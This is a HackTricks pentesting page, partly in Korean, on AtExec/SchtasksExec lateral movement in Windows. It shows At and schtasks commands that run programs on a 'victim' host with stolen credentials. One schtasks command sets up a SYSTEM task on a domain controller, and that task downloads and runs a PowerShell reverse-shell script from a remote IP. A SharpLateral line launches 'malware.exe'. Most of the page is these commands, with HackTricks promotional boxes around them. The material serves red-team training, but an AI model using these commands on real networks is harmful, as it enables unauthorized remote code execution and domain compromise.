AtExec / SchtasksExec

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

How Does it works

At는 사용자 이름/(비밀번호/해시)를 알고 있는 호스트에서 작업을 예약할 수 있게 해줍니다. 따라서 다른 호스트에서 명령을 실행하고 출력을 얻는 데 사용할 수 있습니다.

At \\victim 11:00:00PM shutdown -r

Using schtasks를 사용하여 먼저 작업을 생성한 다음 호출해야 합니다:

{% code overflow="wrap" %}

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

{% endcode %}

{% code overflow="wrap" %}

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

{% endcode %}

또한 SharpLateral을 사용할 수 있습니다:

{% code overflow="wrap" %}

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

{% endcode %}

More information about the use of schtasks with silver tickets here.

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

3.4 KiB Raw Blame History

AtExec / SchtasksExec

How Does it works

3.4 KiB

Raw Blame History